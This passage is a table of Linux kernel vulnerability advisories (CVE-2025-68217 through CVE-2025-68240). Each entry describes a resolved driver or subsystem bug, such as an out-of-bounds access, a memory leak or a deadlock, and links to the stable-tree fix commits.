https://git.kernel.org/stable/c/677e6123e3d24adaa252697dc89740f2ac07664e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Input: pegasus-notetaker - fix potential out-of-bounds access In the pegasus_notetaker driver, the pegasus_probe() function allocates the URB transfer buffer using the wMaxPacketSize value from the endpoint descriptor. An attacker can use a malicious USB descriptor to force the allocation of a very small buffer. Subsequently, if the device sends an interrupt packet with a specific pattern (e.g., where the first byte is 0x80 or 0x42), the pegasus_parse_packet() function parses the packet without checking the allocated buffer size. This leads to an out-of-bounds memory access. | 2025-12-16 | not yet calculated | CVE-2025-68217 | https://git.kernel.org/stable/c/c4e746651bd74c38f581e1cf31651119a94de8cd https://git.kernel.org/stable/c/36bc92b838ff72f62f2c17751a9013b29ead2513 https://git.kernel.org/stable/c/015b719962696b793997e8deefac019f816aca77 https://git.kernel.org/stable/c/084264e10e2ae8938a54355123ad977eb9df56d6 https://git.kernel.org/stable/c/d344ea1baf1946c90f0cd6f9daeb5f3e0a0ca479 https://git.kernel.org/stable/c/9ab67eff6d654e34ba6da07c64761aa87c2a3c26 https://git.kernel.org/stable/c/763c3f4d2394a697d14af1335d3bb42f05c9409f https://git.kernel.org/stable/c/69aeb507312306f73495598a055293fa749d454e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nvme-multipath: fix lockdep WARN due to partition scan work Blktests test cases nvme/014, 057 and 058 fail occasionally due to a lockdep WARN. As reported in the Closes tag URL, the WARN indicates that a deadlock can happen due to the dependency among disk->open_mutex, kblockd workqueue completion and partition_scan_work completion. To avoid the lockdep WARN and the potential deadlock, cut the dependency by running the partition_scan_work not by kblockd workqueue but by nvme_wq. | 2025-12-16 | not yet calculated | CVE-2025-68218 | https://git.kernel.org/stable/c/89456dab7ba5ab63d60945440926673a3205e829 https://git.kernel.org/stable/c/e2a897ad5f538d314955c747a0a2edb184fcdecd https://git.kernel.org/stable/c/ef4ab2a8abe554379e10303ae86f7c501336ba0d https://git.kernel.org/stable/c/b03eb63288a8ffe3adfb34e68309c8e2edb06d0b https://git.kernel.org/stable/c/6d87cd5335784351280f82c47cc8a657271929c3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: cifs: fix memory leak in smb3_fs_context_parse_param error path Add proper cleanup of ctx->source and fc->source to the cifs_parse_mount_err error handler. This ensures that memory allocated for the source strings is correctly freed on all error paths, matching the cleanup already performed in the success path by smb3_cleanup_fs_context_contents(). Pointers are also set to NULL after freeing to prevent potential double-free issues. This change fixes a memory leak originally detected by syzbot. The leak occurred when processing Opt_source mount options if an error happened after ctx->source and fc->source were successfully allocated but before the function completed. The specific leak sequence was: 1. ctx->source = smb3_fs_context_fullpath(ctx, '/') allocates memory 2. fc->source = kstrdup(ctx->source, GFP_KERNEL) allocates more memory 3. A subsequent error jumps to cifs_parse_mount_err 4. The old error handler freed passwords but not the source strings, causing the memory to leak. This issue was not addressed by commit e8c73eb7db0a ("cifs: client: fix memory leak in smb3_fs_context_parse_param"), which only fixed leaks from repeated fsconfig() calls but not this error path. Patch updated with minor change suggested by kernel test robot | 2025-12-16 | not yet calculated | CVE-2025-68219 | https://git.kernel.org/stable/c/7627864dc3121f39e220f5253a227edf472de59e https://git.kernel.org/stable/c/48d69290270891f988e72edddd9688c20515421d https://git.kernel.org/stable/c/37010021d7e0341bb241ca00bcbae31f2c50b23f https://git.kernel.org/stable/c/7e4d9120cfa413dd34f4f434befc5dbe6c38b2e5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: ethernet: ti: netcp: Standardize knav_dma_open_channel to return NULL on error Make knav_dma_open_channel consistently return NULL on error instead of ERR_PTR. Currently the header include/linux/soc/ti/knav_dma.h returns NULL when the driver is disabled, but the driver implementation does not consistently return NULL or ERR_PTR on failure, causing inconsistency in the users. This results in a crash in netcp_free_navigator_resources as follows (trimmed): Unhandled fault: alignment exception (0x221) at 0xfffffff2 [fffffff2] *pgd=80000800207003, *pmd=82ffda003, *pte=00000000 Internal error: : 221 [#1] SMP ARM Modules linked in: CPU: 0 UID: 0 PID: 1 Comm: swapper/0 Not tainted 6.17.0-rc7 #1 NONE Hardware name: Keystone PC is at knav_dma_close_channel+0x30/0x19c LR is at netcp_free_navigator_resources+0x2c/0x28c [... TRIM...] Call trace: knav_dma_close_channel from netcp_free_navigator_resources+0x2c/0x28c netcp_free_navigator_resources from netcp_ndo_open+0x430/0x46c netcp_ndo_open from __dev_open+0x114/0x29c __dev_open from __dev_change_flags+0x190/0x208 __dev_change_flags from netif_change_flags+0x1c/0x58 netif_change_flags from dev_change_flags+0x38/0xa0 dev_change_flags from ip_auto_config+0x2c4/0x11f0 ip_auto_config from do_one_initcall+0x58/0x200 do_one_initcall from kernel_init_freeable+0x1cc/0x238 kernel_init_freeable from kernel_init+0x1c/0x12c kernel_init from ret_from_fork+0x14/0x38 [... TRIM...] Standardize the error handling by making the function return NULL on all error conditions. The API is used only in netcp_core.c so the impact is limited. Note, this change, in effect, reverts commit 5b6cb43b4d62 ("net: ethernet: ti: netcp_core: return error while dma channel open issue"), but provides a less error prone implementation. | 2025-12-16 | not yet calculated | CVE-2025-68220 | https://git.kernel.org/stable/c/af6b10a13fc0aee37df4a8292414cc055c263fa3 https://git.kernel.org/stable/c/8427218ecbd7f8559c37972e66cb0fa06e82353b https://git.kernel.org/stable/c/3afeb909c3e2e0eb19b1e20506196e5f2d9c2259 https://git.kernel.org/stable/c/2572c358ee434ce4b994472cceeb4043cbff5bc5 https://git.kernel.org/stable/c/952637c5b9be64539cd0e13ef88db71a1df46373 https://git.kernel.org/stable/c/fbb53727ca789a8d27052aab4b77ca9e2a0fae2b https://git.kernel.org/stable/c/f9608637ecc165d7d6341df105aee44691461fb9 https://git.kernel.org/stable/c/90a88306eb874fe4bbdd860e6c9787f5bbc588b5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mptcp: fix address removal logic in mptcp_pm_nl_rm_addr Fix inverted WARN_ON_ONCE condition that prevented normal address removal counter updates. The current code only executes decrement logic when the counter is already 0 (abnormal state), while normal removals (counter > 0) are ignored. | 2025-12-16 | not yet calculated | CVE-2025-68221 | https://git.kernel.org/stable/c/f7d953c38245c0e9d8e268fb6a9e524602fb44ec https://git.kernel.org/stable/c/92e239e36d600002559074994a545fcfac9afd2d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: pinctrl: s32cc: fix uninitialized memory in s32_pinctrl_desc s32_pinctrl_desc is allocated with devm_kmalloc(), but not all of its fields are initialized. Notably, num_custom_params is used in pinconf_generic_parse_dt_config(), resulting in intermittent allocation errors, such as the following splat when probing i2c-imx: WARNING: CPU: 0 PID: 176 at mm/page_alloc.c:4795 __alloc_pages_noprof+0x290/0x300 [...] Hardware name: NXP S32G3 Reference Design Board 3 (S32G-VNP-RDB3) (DT) [...] Call trace: __alloc_pages_noprof+0x290/0x300 (P) ___kmalloc_large_node+0x84/0x168 __kmalloc_large_node_noprof+0x34/0x120 __kmalloc_noprof+0x2ac/0x378 pinconf_generic_parse_dt_config+0x68/0x1a0 s32_dt_node_to_map+0x104/0x248 dt_to_map_one_config+0x154/0x1d8 pinctrl_dt_to_map+0x12c/0x280 create_pinctrl+0x6c/0x270 pinctrl_get+0xc0/0x170 devm_pinctrl_get+0x50/0xa0 pinctrl_bind_pins+0x60/0x2a0 really_probe+0x60/0x3a0 [...] __platform_driver_register+0x2c/0x40 i2c_adap_imx_init+0x28/0xff8 [i2c_imx] [...] This results in later parse failures that can cause issues in dependent drivers: s32g-siul2-pinctrl 4009c240.pinctrl: /soc@0/pinctrl@4009c240/i2c0-pins/i2c0-grp0: could not parse node property s32g-siul2-pinctrl 4009c240.pinctrl: /soc@0/pinctrl@4009c240/i2c0-pins/i2c0-grp0: could not parse node property [...] pca953x 0-0022: failed writing register: -6 i2c i2c-0: IMX I2C adapter registered s32g-siul2-pinctrl 4009c240.pinctrl: /soc@0/pinctrl@4009c240/i2c2-pins/i2c2-grp0: could not parse node property s32g-siul2-pinctrl 4009c240.pinctrl: /soc@0/pinctrl@4009c240/i2c2-pins/i2c2-grp0: could not parse node property i2c i2c-1: IMX I2C adapter registered s32g-siul2-pinctrl 4009c240.pinctrl: /soc@0/pinctrl@4009c240/i2c4-pins/i2c4-grp0: could not parse node property s32g-siul2-pinctrl 4009c240.pinctrl: /soc@0/pinctrl@4009c240/i2c4-pins/i2c4-grp0: could not parse node property i2c i2c-2: IMX I2C adapter registered Fix this by initializing s32_pinctrl_desc with devm_kzalloc() instead of devm_kmalloc() in s32_pinctrl_probe(), which sets the previously uninitialized fields to zero. | 2025-12-16 | not yet calculated | CVE-2025-68222 | https://git.kernel.org/stable/c/3b90bd8aaeb21b513ecc4ed03299e80ece44a333 https://git.kernel.org/stable/c/583ac7f65791ceda38ea1a493a4859f7161dcb03 https://git.kernel.org/stable/c/7bbdd6c30e8fd92f7165b7730b038cfe42102004 https://git.kernel.org/stable/c/97ea34defbb57bfaf71ce487b1b0865ffd186e81 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/radeon: delete radeon_fence_process in is_signaled, no deadlock Delete the attempt to progress the queue when checking if fence is signaled. This avoids deadlock. dma-fence_ops::signaled can be called with the fence lock in unknown state. For radeon, the fence lock is also the wait queue lock. This can cause a self deadlock when signaled() tries to make forward progress on the wait queue. But advancing the queue is unneeded because incorrectly returning false from signaled() is perfectly acceptable. (cherry picked from commit 527ba26e50ec2ca2be9c7c82f3ad42998a75d0db) | 2025-12-16 | not yet calculated | CVE-2025-68223 | https://git.kernel.org/stable/c/73bc12d6a547f9571ce4393acfd73c004e2df9e5 https://git.kernel.org/stable/c/7e3e9b3a44c23c8eac86a41308c05077d6d30f41 https://git.kernel.org/stable/c/9eb00b5f5697bd56baa3222c7a1426fa15bacfb5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: core: Fix a regression triggered by scsi_host_busy() Commit 995412e23bb2 ("blk-mq: Replace tags->lock with SRCU for tag iterators") introduced the following regression: Call trace: __srcu_read_lock+0x30/0x80 (P) blk_mq_tagset_busy_iter+0x44/0x300 scsi_host_busy+0x38/0x70 ufshcd_print_host_state+0x34/0x1bc ufshcd_link_startup.constprop.0+0xe4/0x2e0 ufshcd_init+0x944/0xf80 ufshcd_pltfrm_init+0x504/0x820 ufs_rockchip_probe+0x2c/0x88 platform_probe+0x5c/0xa4 really_probe+0xc0/0x38c __driver_probe_device+0x7c/0x150 driver_probe_device+0x40/0x120 __driver_attach+0xc8/0x1e0 bus_for_each_dev+0x7c/0xdc driver_attach+0x24/0x30 bus_add_driver+0x110/0x230 driver_register+0x68/0x130 __platform_driver_register+0x20/0x2c ufs_rockchip_pltform_init+0x1c/0x28 do_one_initcall+0x60/0x1e0 kernel_init_freeable+0x248/0x2c4 kernel_init+0x20/0x140 ret_from_fork+0x10/0x20 Fix this regression by making scsi_host_busy() check whether the SCSI host tag set has already been initialized. tag_set->ops is set by scsi_mq_setup_tags() just before blk_mq_alloc_tag_set() is called. This fix is based on the assumption that scsi_host_busy() and scsi_mq_setup_tags() calls are serialized. This is the case in the UFS driver. | 2025-12-16 | not yet calculated | CVE-2025-68224 | https://git.kernel.org/stable/c/143257917b836bd5fc434063030fda199e249624 https://git.kernel.org/stable/c/804b5b8e3545445450387ae6891262c421c49304 https://git.kernel.org/stable/c/d579f496681c5136d63cb4fbb685511227e73602 https://git.kernel.org/stable/c/5d778778b40bcdfd9f8817fea1ec6ebcbec69c0a https://git.kernel.org/stable/c/47c8b35a1f1d53aac156480cea0a0c5c82919f03 https://git.kernel.org/stable/c/e208fb1660c4a43f06b7b66c3ff22dde84ec3990 https://git.kernel.org/stable/c/a0b7780602b1b196f47e527fec82166a7e67c4d0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: lib/test_kho: check if KHO is enabled We must check whether KHO is enabled prior to issuing KHO commands, otherwise KHO internal data structures are not initialized. | 2025-12-16 | not yet calculated | CVE-2025-68225 | https://git.kernel.org/stable/c/bb3267bedd902ec457643b1326cccddafb82e901 https://git.kernel.org/stable/c/a26ec8f3d4e56d4a7ffa301e8032dca9df0bbc05 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: smb: client: fix incomplete backport in cfids_invalidation_worker() The previous commit bdb596ceb4b7 ("smb: client: fix potential UAF in smb2_close_cached_fid()") was an incomplete backport and missed one kref_put() call in cfids_invalidation_worker() that should have been converted to close_cached_dir(). | 2025-12-16 | not yet calculated | CVE-2025-68226 | https://git.kernel.org/stable/c/abd29b6e17a918fdd68352ce4813e167acc8727e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mptcp: Fix proto fallback detection with BPF The sockmap feature allows bpf syscall from userspace, or based on bpf sockops, replacing the sk_prot of sockets during protocol stack processing with sockmap's custom read/write interfaces. ''' tcp_rcv_state_process() syn_recv_sock()/subflow_syn_recv_sock() tcp_init_transfer(BPF_SOCK_OPS_PASSIVE_ESTABLISHED_CB) bpf_skops_established <== sockops bpf_sock_map_update(sk) <== call bpf helper tcp_bpf_update_proto() <== update sk_prot ''' When the server has MPTCP enabled but the client sends a TCP SYN without MPTCP, subflow_syn_recv_sock() performs a fallback on the subflow, replacing the subflow sk's sk_prot with the native sk_prot. ''' subflow_syn_recv_sock() subflow_ulp_fallback() subflow_drop_ctx() mptcp_subflow_ops_undo_override() ''' Then, this subflow can be normally used by sockmap, which replaces the native sk_prot with sockmap's custom sk_prot. The issue occurs when the user executes accept::mptcp_stream_accept::mptcp_fallback_tcp_ops(). Here, it uses sk->sk_prot to compare with the native sk_prot, but this is incorrect when sockmap is used, as we may incorrectly set sk->sk_socket->ops. This fix uses the more generic sk_family for the comparison instead. Additionally, this also prevents a WARNING from occurring: result from ./scripts/decode_stacktrace.sh: ------------[ cut here ]------------ WARNING: CPU: 0 PID: 337 at net/mptcp/protocol.c:68 mptcp_stream_accept \ (net/mptcp/protocol.c:4005) Modules linked in: ... PKRU: 55555554 Call Trace: <TASK> do_accept (net/socket.c:1989) __sys_accept4 (net/socket.c:2028 net/socket.c:2057) __x64_sys_accept (net/socket.c:2067) x64_sys_call (arch/x86/entry/syscall_64.c:41) do_syscall_64 (arch/x86/entry/syscall_64.c:63 arch/x86/entry/syscall_64.c:94) entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130) RIP: 0033:0x7f87ac92b83d ---[ end trace 0000000000000000 ]--- | 2025-12-16 | not yet calculated | CVE-2025-68227 | https://git.kernel.org/stable/c/92c4092fe012ecdfa5fb05d394f1c1d8f91ad81c https://git.kernel.org/stable/c/7ee8f015eb47907745e2070184a8ab1e442ac3c4 https://git.kernel.org/stable/c/344974ea1a3ca30e4920687b0091bda4438cebdb https://git.kernel.org/stable/c/037cc50589643342d69185b663ecf9d26cce91e8 https://git.kernel.org/stable/c/9b1980b6f23fa30bf12add19f37c7458625099eb https://git.kernel.org/stable/c/1a0d5c74af9b6ba9ffdf1172de5a1a6df5922a00 https://git.kernel.org/stable/c/c77b3b79a92e3345aa1ee296180d1af4e7031f8f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/plane: Fix create_in_format_blob() return value create_in_format_blob() is either supposed to return a valid pointer or an error, but never NULL. The caller will dereference the blob when it is not an error, and thus will oops if NULL returned. Return proper error values in the failure cases. | 2025-12-16 | not yet calculated | CVE-2025-68228 | https://git.kernel.org/stable/c/860f93f4fce1e733b8a2474f6bfa153243d775f3 https://git.kernel.org/stable/c/cead55e24cf9e092890cf51c0548eccd7569defa |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: target: tcm_loop: Fix segfault in tcm_loop_tpg_address_show() If the allocation of tl_hba->sh fails in tcm_loop_driver_probe() and we attempt to dereference it in tcm_loop_tpg_address_show() we will get a segfault, see below for an example. So, check tl_hba->sh before dereferencing it. Unable to allocate struct scsi_host BUG: kernel NULL pointer dereference, address: 0000000000000194 #PF: supervisor read access in kernel mode #PF: error_code(0x0000) - not-present page PGD 0 P4D 0 Oops: 0000 [#1] PREEMPT SMP NOPTI CPU: 1 PID: 8356 Comm: tokio-runtime-w Not tainted 6.6.104.2-4.azl3 #1 Hardware name: Microsoft Corporation Virtual Machine/Virtual Machine, BIOS Hyper-V UEFI Release v4.1 09/28/2024 RIP: 0010:tcm_loop_tpg_address_show+0x2e/0x50 [tcm_loop] ... Call Trace: <TASK> configfs_read_iter+0x12d/0x1d0 [configfs] vfs_read+0x1b5/0x300 ksys_read+0x6f/0xf0 ... | 2025-12-16 | not yet calculated | CVE-2025-68229 | https://git.kernel.org/stable/c/63f511d3855f7f4b35dd63dbc58fc3d935a81268 https://git.kernel.org/stable/c/3d8c517f6eb27e47b1a198e05f8023038329b40b https://git.kernel.org/stable/c/f449a1edd7a13bb025aaf9342ea6f8bf92684bbf https://git.kernel.org/stable/c/1c9ba455b5073253ceaadae4859546e38e8261fe https://git.kernel.org/stable/c/a6ef60898ddaf1414592ce3e5b0d94276d631663 https://git.kernel.org/stable/c/72e8831079266749a7023618a0de2f289a9dced6 https://git.kernel.org/stable/c/13aff3b8a7184281b134698704d6c06863a8361b https://git.kernel.org/stable/c/e6965188f84a7883e6a0d3448e86b0cf29b24dfc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: fix gpu page fault after hibernation on PF passthrough On a PF passthrough environment, after hibernate and then resume, coralgemm will cause a gpu page fault. A Mode1 reset happens during hibernate, but the partition mode is not restored on resume, so the registers mmCP_HYP_XCP_CTL and mmCP_PSP_XCP_CTL are not right after resume. When the CP accesses the MQD BO, the wrong stride size is used; this causes an out of bound access on the MQD BO, resulting in a page fault. The fix is to ensure gfx_v9_4_3_switch_compute_partition() is called when resuming from a hibernation. KFD resume is called separately during a reset recovery or resume from suspend sequence. Hence it's not required to be called as part of partition switch. (cherry picked from commit 5d1b32cfe4a676fe552416cb5ae847b215463a1a) | 2025-12-16 | not yet calculated | CVE-2025-68230 | https://git.kernel.org/stable/c/a45d6359eefb41e08d374a3260b10bff5626823b https://git.kernel.org/stable/c/eef72d856f978955e633c270abb1f7ec7b61c6d2 https://git.kernel.org/stable/c/eb6e7f520d6efa4d4ebf1671455abe4a681f7a05 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/mempool: fix poisoning order>0 pages with HIGHMEM The kernel test has reported: BUG: unable to handle page fault for address: fffba000 #PF: supervisor write access in kernel mode #PF: error_code(0x0002) - not-present page *pde = 03171067 *pte = 00000000 Oops: Oops: 0002 [#1] CPU: 0 UID: 0 PID: 1 Comm: swapper/0 Tainted: G T 6.18.0-rc2-00031-gec7f31b2a2d3 #1 NONE a1d066dfe789f54bc7645c7989957d2bdee593ca Tainted: [T]=RANDSTRUCT Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014 EIP: memset (arch/x86/include/asm/string_32.h:168 arch/x86/lib/memcpy_32.c:17) Code: a5 8b 4d f4 83 e1 03 74 02 f3 a4 83 c4 04 5e 5f 5d 2e e9 73 41 01 00 90 90 90 3e 8d 74 26 00 55 89 e5 57 56 89 c6 89 d0 89 f7 <f3> aa 89 f0 5e 5f 5d 2e e9 53 41 01 00 cc cc cc 55 89 e5 53 57 56 EAX: 0000006b EBX: 00000015 ECX: 001fefff EDX: 0000006b ESI: fffb9000 EDI: fffba000 EBP: c611fbf0 ESP: c611fbe8 DS: 007b ES: 007b FS: 0000 GS: 0000 SS: 0068 EFLAGS: 00010287 CR0: 80050033 CR2: fffba000 CR3: 0316e000 CR4: 00040690 Call Trace: poison_element (mm/mempool.c:83 mm/mempool.c:102) mempool_init_node (mm/mempool.c:142 mm/mempool.c:226) mempool_init_noprof (mm/mempool.c:250 (discriminator 1)) ? mempool_alloc_pages (mm/mempool.c:640) bio_integrity_initfn (block/bio-integrity.c:483 (discriminator 8)) ? mempool_alloc_pages (mm/mempool.c:640) do_one_initcall (init/main.c:1283) Christoph found out this is due to the poisoning code not dealing properly with CONFIG_HIGHMEM because only the first page is mapped but then the whole potentially high-order page is accessed. We could give up on HIGHMEM here, but it's straightforward to fix this with a loop that's mapping, poisoning or checking and unmapping individual pages. | 2025-12-16 | not yet calculated | CVE-2025-68231 | https://git.kernel.org/stable/c/ea4131665107e66ece90e66bcec1a2f1246cbd41 https://git.kernel.org/stable/c/19de79aaea33ee1ea058c8711b3b2b4a7e4decd4 https://git.kernel.org/stable/c/6a13b56537e7b0d97f4bb74e8038ce471f9770d7 https://git.kernel.org/stable/c/a79e49e1704367b635edad1479db23d7cf1fb71a https://git.kernel.org/stable/c/ec33b59542d96830e3c89845ff833cf7b25ef172 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: veth: more robust handing of race to avoid txq getting stuck Commit dc82a33297fc ("veth: apply qdisc backpressure on full ptr_ring to reduce TX drops") introduced a race condition that can lead to a permanently stalled TXQ. This was observed in production on ARM64 systems (Ampere Altra Max). The race occurs in veth_xmit(). The producer observes a full ptr_ring and stops the queue (netif_tx_stop_queue()). The subsequent conditional logic, intended to re-wake the queue if the consumer had just emptied it (if (__ptr_ring_empty(...)) netif_tx_wake_queue()), can fail. This leads to a "lost wakeup" where the TXQ remains stopped (QUEUE_STATE_DRV_XOFF) and traffic halts. This failure is caused by an incorrect use of the __ptr_ring_empty() API from the producer side. As noted in kernel comments, this check is not guaranteed to be correct if a consumer is operating on another CPU. The empty test is based on ptr_ring->consumer_head, making it reliable only for the consumer. Using this check from the producer side is fundamentally racy. This patch fixes the race by adopting the more robust logic from an earlier version V4 of the patchset, which always flushed the peer: (1) In veth_xmit(), the racy conditional wake-up logic and its memory barrier are removed. Instead, after stopping the queue, we unconditionally call __veth_xdp_flush(rq). This guarantees that the NAPI consumer is scheduled, making it solely responsible for re-waking the TXQ. This handles the race where veth_poll() consumes all packets and completes NAPI *before* veth_xmit() on the producer side has called netif_tx_stop_queue. The __veth_xdp_flush(rq) will observe rx_notify_masked is false and schedule NAPI. (2) On the consumer side, the logic for waking the peer TXQ is moved out of veth_xdp_rcv() and placed at the end of the veth_poll() function. This placement is part of fixing the race, as the netif_tx_queue_stopped() check must occur after rx_notify_masked is potentially set to false during NAPI completion. This handles the race where veth_poll() consumes all packets, but hasn't finished (rx_notify_masked is still true). The producer veth_xmit() stops the TXQ and __veth_xdp_flush(rq) will observe rx_notify_masked is true, meaning it does not start NAPI. Then veth_poll() changes rx_notify_masked to false and stops NAPI. Before exiting, veth_poll() will observe the TXQ is stopped and wake it up. | 2025-12-16 | not yet calculated | CVE-2025-68232 | https://git.kernel.org/stable/c/dd419a3f2ebc18cc00bc32c57fd052d7a188b78b https://git.kernel.org/stable/c/6c8a8b9257a660e622689e23c8fbad4ba2b561b9 https://git.kernel.org/stable/c/5442a9da69789741bfda39f34ee7f69552bf0c56 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/tegra: Add call to put_pid() Add a call to put_pid() corresponding to get_task_pid(). host1x_memory_context_alloc() does not take ownership of the PID so we need to free it here to avoid leaking. [mperttunen@nvidia.com: reword commit message] | 2025-12-16 | not yet calculated | CVE-2025-68233 | https://git.kernel.org/stable/c/6b572e5154af08ee13f8d2673e86f83bc5ff86cd https://git.kernel.org/stable/c/2e78580e6e7deac6556236ef96db5bbf7b46857e https://git.kernel.org/stable/c/cbf2cbdb0733d7974dab296ffba0e7ae9b6524e5 https://git.kernel.org/stable/c/27ea5c2c75c3419a9a019240ca44b9256f628df1 https://git.kernel.org/stable/c/6cbab9f0da72b4dc3c3f9161197aa3b9daa1fa3a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: io_uring/cmd_net: fix wrong argument types for skb_queue_splice() If timestamp retrieving needs to be retried and the local list of SKBs already has entries, then it's spliced back into the socket queue. However, the arguments for the splice helper are transposed, causing exactly the wrong direction of splicing into the on-stack list. Fix that up. | 2025-12-16 | not yet calculated | CVE-2025-68234 | https://git.kernel.org/stable/c/c85d2cfc5e24e6866b56c7253fd4e1c7db35986c https://git.kernel.org/stable/c/46447367a52965e9d35f112f5b26fc8ff8ec443d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nouveau/firmware: Add missing kfree() of nvkm_falcon_fw::boot nvkm_falcon_fw::boot is allocated, but no one frees it. This causes a kmemleak warning. Make sure this data is deallocated. | 2025-12-16 | not yet calculated | CVE-2025-68235 | https://git.kernel.org/stable/c/7d1977b4ae5c50e1aafc5c51500fc08bd7afd6a0 https://git.kernel.org/stable/c/6492add9a3a163d5e0390428d2636adc3e61b883 https://git.kernel.org/stable/c/2bba02a39bfb383bd1a95868d532c0917e38f9e7 https://git.kernel.org/stable/c/949f1fd2225baefbea2995afa807dba5cbdb6bd3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: ufs: ufs-qcom: Fix UFS OCP issue during UFS power down (PC=3) According to UFS specifications, the power-off sequence for a UFS device includes: - Sending an SSU command with Power_Condition=3 and awaiting a response. - Asserting RST_N low. - Turning off REF_CLK. - Turning off VCC. - Turning off VCCQ/VCCQ2. As part of UFS shutdown, after the SSU command completion, asserting hardware reset (HWRST) triggers the device firmware to wake up and execute its reset routine. This routine initializes hardware blocks and takes a few milliseconds to complete. During this time, the ICCQ draws a large current. This large ICCQ current may cause issues for the regulator which is supplying power to UFS, because the turn-off request from the UFS driver to the regulator framework will be immediately followed by a low power mode (LPM) request by the regulator framework. This is done by the framework because UFS, which is the only client, is requesting a disable. So if the rail is still in the process of shutting down while ICCQ exceeds LPM current thresholds, and LPM mode is activated in hardware during this state, it may trigger an overcurrent protection (OCP) fault in the regulator. To prevent this, a 10ms delay is added after asserting HWRST. This allows the reset operation to complete while power rails remain active and in high-power mode. Currently there is no way for the Host to query whether the reset is completed or not, and hence the delay is based on experiments with Qualcomm UFS controllers across multiple UFS vendors. | 2025-12-16 | not yet calculated | CVE-2025-68236 | https://git.kernel.org/stable/c/b712f234a74c1f5ce70b5d7aec3fc2499c258141 https://git.kernel.org/stable/c/5127be409c6c3815c4a7d8f6d88043e44f9b9543 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mtdchar: fix integer overflow in read/write ioctls The "req.start" and "req.len" variables are u64 values that come from the user at the start of the function. We mask away the high 32 bits of "req.len" so that's capped at U32_MAX but the "req.start" variable can go up to U64_MAX which means that the addition can still integer overflow. Use check_add_overflow() to fix this bug. | 2025-12-16 | not yet calculated | CVE-2025-68237 | https://git.kernel.org/stable/c/f37efdd97fd1ec3e0d0f1eec279c8279e28f981e https://git.kernel.org/stable/c/457376c6fbf0c69326a9bf1f72416225f681192b https://git.kernel.org/stable/c/eb9361484814fb12f3b7544b33835ea67d7a6a97 https://git.kernel.org/stable/c/37944f4f8199cd153fef74e95ca268020162f212 https://git.kernel.org/stable/c/e4185bed738da755b191aa3f2e16e8b48450e1b8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mtd: rawnand: cadence: fix DMA device NULL pointer dereference The DMA device pointer `dma_dev` was being dereferenced before ensuring that `cdns_ctrl->dmac` is properly initialized. Move the assignment of `dma_dev` after successfully acquiring the DMA channel to ensure the pointer is valid before use. | 2025-12-16 | not yet calculated | CVE-2025-68238 | https://git.kernel.org/stable/c/2178b0255eae108bb10e5e99658b28641bc06f43 https://git.kernel.org/stable/c/9c58c64ec41290c12490ca7e1df45013fbbb41fd https://git.kernel.org/stable/c/e282a4fdf3c6ee842a720010a8b5f7d77bedd126 https://git.kernel.org/stable/c/b146e0b085d9d6bfe838e0a15481cba7d093c67f https://git.kernel.org/stable/c/0c635241a62f2f5da1b48bfffae226d1f86a76ef https://git.kernel.org/stable/c/0c2a43cb43786011b48eeab6093db14888258c6b https://git.kernel.org/stable/c/5c56bf214af85ca042bf97f8584aab2151035840 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: binfmt_misc: restore write access before closing files opened by open_exec() bm_register_write() opens an executable file using open_exec(), which internally calls do_open_execat() and denies write access on the file to avoid modification while it is being executed. However, when an error occurs, bm_register_write() closes the file using filp_close() directly. This does not restore the write permission, which may cause subsequent write operations on the same file to fail. Fix this by calling exe_file_allow_write_access() before filp_close() to restore the write permission properly. | 2025-12-16 | not yet calculated | CVE-2025-68239 | https://git.kernel.org/stable/c/e785f552ab04dbca01d31f0334f4561240b04459 https://git.kernel.org/stable/c/90f601b497d76f40fa66795c3ecf625b6aced9fd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nilfs2: avoid having an active sc_timer before freeing sci Because kthread_stop did not stop sc_task properly and returned -EINTR, the sc_timer was not properly closed, ultimately causing the problem [1] reported by syzbot when freeing sci due to the sc_timer not being closed. Because the thread sc_task main function nilfs_segctor_thread() returns 0 when it succeeds, when the return value of kthread_stop() is not 0 in nilfs_segctor_destroy(), we believe that it has not properly closed sc_timer. We use timer_shutdown_sync() to synchronously wait for sc_timer to shut down, and set the value of sc_task to NULL under the protection of lock sc_state_lock, so as to avoid the issue caused by sc_timer not being properly shut down. [1] ODEBUG: free active (active state 0) object: 00000000dacb411a object type: timer_list hint: nilfs_construction_timeout Call trace: nilfs_segctor_destroy fs/nilfs2/segment.c:2811 [inline] nilfs_detach_log_writer+0x668/0x8cc fs/nilfs2/segment.c:2877 nilfs_put_super+0x4c/0x12c fs/nilfs2/super.c:509 | 2025-12-16 | not yet calculated | CVE-2025-68240 | https://git.kernel.org/stable/c/36049e81dc7f077e0e24d5b9688a7458beacef8f https://git.kernel.org/stable/c/2f65799e2a736d556d306440c4e1e8906736117a https://git.kernel.org/stable/c/9a6b60cb147d53968753a34805211d2e5e08c027 |
